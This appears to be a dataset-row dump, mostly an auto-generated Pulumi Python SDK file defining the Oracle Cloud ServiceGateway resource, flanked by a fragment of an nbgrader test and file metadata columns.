    self._make_file(join(course_dir, "autograded", "foo", "ps1", "timestamp.txt"), "2015-02-02 16:58:23.948203 PST")
    run_nbgrader(["feedback", "ps1", "--notebook", "p1"])
    assert exists(join(feedback_dir, "p1.html"))
    assert exists(join(feedback_dir, "p2.html"))
    assert isfile(join(feedback_dir, "timestamp.txt"))
    assert self._file_contents(join(feedback_dir, "timestamp.txt")) == "2015-02-02 16:58:23.948203 PST"
    assert p1 != self._file_contents(join(feedback_dir, "p1.html"))
    assert p2 == self._file_contents(join(feedback_dir, "p2.html"))
| 59.516667
| 131
| 0.604873
| 1,848
| 14,284
| 4.513528
| 0.071429
| 0.120849
| 0.162091
| 0.161132
| 0.926268
| 0.916317
| 0.906606
| 0.899532
| 0.899532
| 0.889821
| 0
| 0.032691
| 0.181952
| 14,284
| 239
| 132
| 59.76569
| 0.68113
| 0.035004
| 0
| 0.824176
| 0
| 0
| 0.323902
| 0.048516
| 0
| 0
| 0
| 0
| 0.296703
| 1
| 0.049451
| false
| 0
| 0.032967
| 0
| 0.087912
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
63a17287ff34ce89f90f6c14e5d782770983f8af
| 35,215
|
py
|
Python
|
sdk/python/pulumi_oci/core/service_gateway.py
|
EladGabay/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 5
|
2021-08-17T11:14:46.000Z
|
2021-12-31T02:07:03.000Z
|
sdk/python/pulumi_oci/core/service_gateway.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-09-06T11:21:29.000Z
|
2021-09-06T11:21:29.000Z
|
sdk/python/pulumi_oci/core/service_gateway.py
|
pulumi-oci/pulumi-oci
|
6841e27d4a1a7e15c672306b769912efbfd3ba99
|
[
"ECL-2.0",
"Apache-2.0"
] | 2
|
2021-08-24T23:31:30.000Z
|
2022-01-02T19:26:54.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
from . import outputs
from ._inputs import *
__all__ = ['ServiceGatewayArgs', 'ServiceGateway']
@pulumi.input_type
class ServiceGatewayArgs:
    def __init__(__self__, *,
                 compartment_id: pulumi.Input[str],
                 services: pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]],
                 vcn_id: pulumi.Input[str],
                 defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 route_table_id: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a ServiceGateway resource.

        :param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
        :param pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]] services: (Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
        :param pulumi.Input[str] vcn_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
        :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
        :param pulumi.Input[str] display_name: (Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
        :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
        :param pulumi.Input[str] route_table_id: (Updatable) The OCID of the route table the service gateway will use.
        """
        # Required arguments are always stored; optional ones only when
        # supplied, so unset properties stay absent from the input bag.
        pulumi.set(__self__, "compartment_id", compartment_id)
        pulumi.set(__self__, "services", services)
        pulumi.set(__self__, "vcn_id", vcn_id)
        if defined_tags is not None:
            pulumi.set(__self__, "defined_tags", defined_tags)
        if display_name is not None:
            pulumi.set(__self__, "display_name", display_name)
        if freeform_tags is not None:
            pulumi.set(__self__, "freeform_tags", freeform_tags)
        if route_table_id is not None:
            pulumi.set(__self__, "route_table_id", route_table_id)

    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> pulumi.Input[str]:
        """
        (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
        """
        return pulumi.get(self, "compartment_id")

    @compartment_id.setter
    def compartment_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "compartment_id", value)

    @property
    @pulumi.getter
    def services(self) -> pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]]:
        """
        (Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
        """
        return pulumi.get(self, "services")

    @services.setter
    def services(self, value: pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]]):
        pulumi.set(self, "services", value)

    @property
    @pulumi.getter(name="vcnId")
    def vcn_id(self) -> pulumi.Input[str]:
        """
        The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
        """
        return pulumi.get(self, "vcn_id")

    @vcn_id.setter
    def vcn_id(self, value: pulumi.Input[str]):
        pulumi.set(self, "vcn_id", value)

    @property
    @pulumi.getter(name="definedTags")
    def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
        """
        return pulumi.get(self, "defined_tags")

    @defined_tags.setter
    def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "defined_tags", value)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter(name="freeformTags")
    def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
        """
        return pulumi.get(self, "freeform_tags")

    @freeform_tags.setter
    def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "freeform_tags", value)

    @property
    @pulumi.getter(name="routeTableId")
    def route_table_id(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The OCID of the route table the service gateway will use.
        """
        return pulumi.get(self, "route_table_id")

    @route_table_id.setter
    def route_table_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "route_table_id", value)
@pulumi.input_type
class _ServiceGatewayState:
    def __init__(__self__, *,
                 block_traffic: Optional[pulumi.Input[bool]] = None,
                 compartment_id: Optional[pulumi.Input[str]] = None,
                 defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 display_name: Optional[pulumi.Input[str]] = None,
                 freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                 route_table_id: Optional[pulumi.Input[str]] = None,
                 services: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]]] = None,
                 state: Optional[pulumi.Input[str]] = None,
                 time_created: Optional[pulumi.Input[str]] = None,
                 vcn_id: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering ServiceGateway resources.

        :param pulumi.Input[bool] block_traffic: Whether the service gateway blocks all traffic through it. The default is `false`. When this is `true`, traffic is not routed to any services, regardless of route rules. Example: `true`
        :param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
        :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
        :param pulumi.Input[str] display_name: (Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
        :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
        :param pulumi.Input[str] route_table_id: (Updatable) The OCID of the route table the service gateway will use.
        :param pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]] services: (Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
        :param pulumi.Input[str] state: The service gateway's current state.
        :param pulumi.Input[str] time_created: The date and time the service gateway was created, in the format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). Example: `2016-08-25T21:10:29.600Z`
        :param pulumi.Input[str] vcn_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
        """
        # Every state field is optional: only supplied values are recorded.
        if block_traffic is not None:
            pulumi.set(__self__, "block_traffic", block_traffic)
        if compartment_id is not None:
            pulumi.set(__self__, "compartment_id", compartment_id)
        if defined_tags is not None:
            pulumi.set(__self__, "defined_tags", defined_tags)
        if display_name is not None:
            pulumi.set(__self__, "display_name", display_name)
        if freeform_tags is not None:
            pulumi.set(__self__, "freeform_tags", freeform_tags)
        if route_table_id is not None:
            pulumi.set(__self__, "route_table_id", route_table_id)
        if services is not None:
            pulumi.set(__self__, "services", services)
        if state is not None:
            pulumi.set(__self__, "state", state)
        if time_created is not None:
            pulumi.set(__self__, "time_created", time_created)
        if vcn_id is not None:
            pulumi.set(__self__, "vcn_id", vcn_id)

    @property
    @pulumi.getter(name="blockTraffic")
    def block_traffic(self) -> Optional[pulumi.Input[bool]]:
        """
        Whether the service gateway blocks all traffic through it. The default is `false`. When this is `true`, traffic is not routed to any services, regardless of route rules. Example: `true`
        """
        return pulumi.get(self, "block_traffic")

    @block_traffic.setter
    def block_traffic(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "block_traffic", value)

    @property
    @pulumi.getter(name="compartmentId")
    def compartment_id(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
        """
        return pulumi.get(self, "compartment_id")

    @compartment_id.setter
    def compartment_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "compartment_id", value)

    @property
    @pulumi.getter(name="definedTags")
    def defined_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
        """
        return pulumi.get(self, "defined_tags")

    @defined_tags.setter
    def defined_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "defined_tags", value)

    @property
    @pulumi.getter(name="displayName")
    def display_name(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
        """
        return pulumi.get(self, "display_name")

    @display_name.setter
    def display_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "display_name", value)

    @property
    @pulumi.getter(name="freeformTags")
    def freeform_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
        """
        (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
        """
        return pulumi.get(self, "freeform_tags")

    @freeform_tags.setter
    def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
        pulumi.set(self, "freeform_tags", value)

    @property
    @pulumi.getter(name="routeTableId")
    def route_table_id(self) -> Optional[pulumi.Input[str]]:
        """
        (Updatable) The OCID of the route table the service gateway will use.
        """
        return pulumi.get(self, "route_table_id")

    @route_table_id.setter
    def route_table_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "route_table_id", value)

    @property
    @pulumi.getter
    def services(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]]]:
        """
        (Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
        """
        return pulumi.get(self, "services")

    @services.setter
    def services(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ServiceGatewayServiceArgs']]]]):
        pulumi.set(self, "services", value)

    @property
    @pulumi.getter
    def state(self) -> Optional[pulumi.Input[str]]:
        """
        The service gateway's current state.
        """
        return pulumi.get(self, "state")

    @state.setter
    def state(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "state", value)

    @property
    @pulumi.getter(name="timeCreated")
    def time_created(self) -> Optional[pulumi.Input[str]]:
        """
        The date and time the service gateway was created, in the format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). Example: `2016-08-25T21:10:29.600Z`
        """
        return pulumi.get(self, "time_created")

    @time_created.setter
    def time_created(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "time_created", value)

    @property
    @pulumi.getter(name="vcnId")
    def vcn_id(self) -> Optional[pulumi.Input[str]]:
        """
        The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
        """
        return pulumi.get(self, "vcn_id")

    @vcn_id.setter
    def vcn_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "vcn_id", value)
class ServiceGateway(pulumi.CustomResource):
@overload
def __init__(__self__,
             resource_name: str,
             opts: Optional[pulumi.ResourceOptions] = None,
             compartment_id: Optional[pulumi.Input[str]] = None,
             defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
             display_name: Optional[pulumi.Input[str]] = None,
             freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
             route_table_id: Optional[pulumi.Input[str]] = None,
             services: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceGatewayServiceArgs']]]]] = None,
             vcn_id: Optional[pulumi.Input[str]] = None,
             __props__=None):
    """
    This resource provides the Service Gateway resource in Oracle Cloud Infrastructure Core service.

    Creates a new service gateway in the specified compartment.

    For the purposes of access control, you must provide the OCID of the compartment where you want
    the service gateway to reside. For more information about compartments and access control, see
    [Overview of the IAM Service](https://docs.cloud.oracle.com/iaas/Content/Identity/Concepts/overview.htm).
    For information about OCIDs, see [Resource Identifiers](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).

    You may optionally specify a *display name* for the service gateway, otherwise a default is provided.
    It does not have to be unique, and you can change it. Avoid entering confidential information.

    ## Example Usage

    ```python
    import pulumi
    import pulumi_oci as oci

    test_service_gateway = oci.core.ServiceGateway("testServiceGateway",
        compartment_id=var["compartment_id"],
        services=[oci.core.ServiceGatewayServiceArgs(
            service_id=data["oci_core_services"]["test_services"]["services"][0]["id"],
        )],
        vcn_id=oci_core_vcn["test_vcn"]["id"],
        defined_tags={
            "Operations.CostCenter": "42",
        },
        display_name=var["service_gateway_display_name"],
        freeform_tags={
            "Department": "Finance",
        },
        route_table_id=oci_core_route_table["test_route_table"]["id"])
    ```

    ## Import

    ServiceGateways can be imported using the `id`, e.g.

    ```sh
    $ pulumi import oci:core/serviceGateway:ServiceGateway test_service_gateway "id"
    ```

    :param str resource_name: The name of the resource.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[str] compartment_id: (Updatable) The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
    :param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
    :param pulumi.Input[str] display_name: (Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
    :param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
    :param pulumi.Input[str] route_table_id: (Updatable) The OCID of the route table the service gateway will use.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceGatewayServiceArgs']]]] services: (Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
    :param pulumi.Input[str] vcn_id: The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
    """
    ...
@overload
def __init__(__self__,
             resource_name: str,
             args: ServiceGatewayArgs,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    This resource provides the Service Gateway resource in Oracle Cloud Infrastructure Core service.

    Creates a new service gateway in the specified compartment.

    For the purposes of access control, you must provide the OCID of the compartment where you want
    the service gateway to reside. For more information about compartments and access control, see
    [Overview of the IAM Service](https://docs.cloud.oracle.com/iaas/Content/Identity/Concepts/overview.htm).
    For information about OCIDs, see [Resource Identifiers](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm).

    You may optionally specify a *display name* for the service gateway, otherwise a default is provided.
    It does not have to be unique, and you can change it. Avoid entering confidential information.

    ## Example Usage

    ```python
    import pulumi
    import pulumi_oci as oci

    test_service_gateway = oci.core.ServiceGateway("testServiceGateway",
        compartment_id=var["compartment_id"],
        services=[oci.core.ServiceGatewayServiceArgs(
            service_id=data["oci_core_services"]["test_services"]["services"][0]["id"],
        )],
        vcn_id=oci_core_vcn["test_vcn"]["id"],
        defined_tags={
            "Operations.CostCenter": "42",
        },
        display_name=var["service_gateway_display_name"],
        freeform_tags={
            "Department": "Finance",
        },
        route_table_id=oci_core_route_table["test_route_table"]["id"])
    ```

    ## Import

    ServiceGateways can be imported using the `id`, e.g.

    ```sh
    $ pulumi import oci:core/serviceGateway:ServiceGateway test_service_gateway "id"
    ```

    :param str resource_name: The name of the resource.
    :param ServiceGatewayArgs args: The arguments to use to populate this resource's properties.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
    # Dispatch between the two typing overloads: callers may pass either a
    # ServiceGatewayArgs object or plain keyword properties.  The SDK helper
    # decides which form was used and normalizes the resource options.
    typed_args, resource_opts = _utilities.get_resource_args_opts(
        ServiceGatewayArgs, pulumi.ResourceOptions, *args, **kwargs)
    if typed_args is None:
        # Keyword-property form: forward the call unchanged.
        __self__._internal_init(resource_name, *args, **kwargs)
    else:
        # Args-object form: expand the args object into keyword properties.
        __self__._internal_init(resource_name, resource_opts, **typed_args.__dict__)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   compartment_id: Optional[pulumi.Input[str]] = None,
                   defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                   display_name: Optional[pulumi.Input[str]] = None,
                   freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
                   route_table_id: Optional[pulumi.Input[str]] = None,
                   services: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceGatewayServiceArgs']]]]] = None,
                   vcn_id: Optional[pulumi.Input[str]] = None,
                   __props__=None):
    """Shared implementation behind both ``__init__`` overloads.

    Validates the resource options, builds the property bag for a new
    resource (or accepts a pre-built ``__props__`` when looking one up by
    id), and registers the resource with the Pulumi engine.
    """
    # Normalize the options object; mutating the caller's opts in place is
    # the upstream pulumi SDK convention for filling in the plugin version.
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        opts.version = _utilities.get_version()
    if opts.id is None:
        # Creating a new resource: build the property bag from scratch.
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        __props__ = ServiceGatewayArgs.__new__(ServiceGatewayArgs)
        # These inputs are required unless the resource is being adopted
        # through an explicit URN.
        for required_name, required_value in (('compartment_id', compartment_id),
                                              ('services', services),
                                              ('vcn_id', vcn_id)):
            if required_value is None and not opts.urn:
                raise TypeError("Missing required property '%s'" % required_name)
        __props__.__dict__.update(
            compartment_id=compartment_id,
            defined_tags=defined_tags,
            display_name=display_name,
            freeform_tags=freeform_tags,
            route_table_id=route_table_id,
            services=services,
            vcn_id=vcn_id,
            # Output-only attributes start unset and are resolved by the
            # provider after deployment.
            block_traffic=None,
            state=None,
            time_created=None)
    super(ServiceGateway, __self__).__init__(
        'oci:core/serviceGateway:ServiceGateway',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        block_traffic: Optional[pulumi.Input[bool]] = None,
        compartment_id: Optional[pulumi.Input[str]] = None,
        defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
        display_name: Optional[pulumi.Input[str]] = None,
        freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
        route_table_id: Optional[pulumi.Input[str]] = None,
        services: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ServiceGatewayServiceArgs']]]]] = None,
        state: Optional[pulumi.Input[str]] = None,
        time_created: Optional[pulumi.Input[str]] = None,
        vcn_id: Optional[pulumi.Input[str]] = None) -> 'ServiceGateway':
    """Look up an existing ServiceGateway by name and provider ``id``.

    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.

    The remaining keyword arguments (``block_traffic``, ``compartment_id``,
    ``defined_tags``, ``display_name``, ``freeform_tags``,
    ``route_table_id``, ``services``, ``state``, ``time_created``,
    ``vcn_id``) optionally seed the returned resource's state; their
    semantics match the identically-named resource properties documented
    on the corresponding ``@property`` accessors of this class.
    """
    # Fold the provider id into the resource options so the engine performs
    # a lookup instead of a create.
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
    state_bag = _ServiceGatewayState.__new__(_ServiceGatewayState)
    state_bag.__dict__.update(
        block_traffic=block_traffic,
        compartment_id=compartment_id,
        defined_tags=defined_tags,
        display_name=display_name,
        freeform_tags=freeform_tags,
        route_table_id=route_table_id,
        services=services,
        state=state,
        time_created=time_created,
        vcn_id=vcn_id)
    return ServiceGateway(resource_name, opts=opts, __props__=state_bag)
# ----- Read-only resource outputs -----------------------------------------
# Each accessor below simply forwards to pulumi.get(); the camelCase name in
# @pulumi.getter(name=...) is the wire/schema name for the property.
@property
@pulumi.getter(name="blockTraffic")
def block_traffic(self) -> pulumi.Output[bool]:
"""
Whether the service gateway blocks all traffic through it. The default is `false`. When this is `true`, traffic is not routed to any services, regardless of route rules. Example: `true`
"""
return pulumi.get(self, "block_traffic")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
(Updatable) The [OCID] (https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the compartment to contain the service gateway.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Operations.CostCenter": "42"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) A user-friendly name. Does not have to be unique, and it's changeable. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Free-form tags for this resource. Each tag is a simple key-value pair with no predefined name, type, or namespace. For more information, see [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"Department": "Finance"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="routeTableId")
def route_table_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of the route table the service gateway will use.
"""
return pulumi.get(self, "route_table_id")
@property
@pulumi.getter
def services(self) -> pulumi.Output[Sequence['outputs.ServiceGatewayService']]:
"""
(Updatable) List of the OCIDs of the [Service](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/Service/) objects to enable for the service gateway. This list can be empty if you don't want to enable any `Service` objects when you create the gateway. You can enable a `Service` object later by using either [AttachServiceId](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/AttachServiceId) or [UpdateServiceGateway](https://docs.cloud.oracle.com/iaas/api/#/en/iaas/latest/ServiceGateway/UpdateServiceGateway).
"""
return pulumi.get(self, "services")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The service gateway's current state.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
The date and time the service gateway was created, in the format defined by [RFC3339](https://tools.ietf.org/html/rfc3339). Example: `2016-08-25T21:10:29.600Z`
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="vcnId")
def vcn_id(self) -> pulumi.Output[str]:
"""
The [OCID](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm) of the VCN.
"""
return pulumi.get(self, "vcn_id")
| 58.789649
| 648
| 0.680903
| 4,425
| 35,215
| 5.264407
| 0.062373
| 0.059498
| 0.039665
| 0.045503
| 0.90762
| 0.891779
| 0.878515
| 0.866581
| 0.860442
| 0.835029
| 0
| 0.004312
| 0.203095
| 35,215
| 598
| 649
| 58.88796
| 0.825785
| 0.511146
| 0
| 0.674051
| 1
| 0
| 0.111033
| 0.018676
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161392
| false
| 0.003165
| 0.022152
| 0
| 0.281646
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
63a404a73eee452883340218134affaf9b2e8f8c
| 6,867
|
py
|
Python
|
tests/test_doubles/test_doubles_expectations_test.py
|
Avvir/pyne
|
864885a8fb632b72c00af164f150b1daa38a346f
|
[
"MIT"
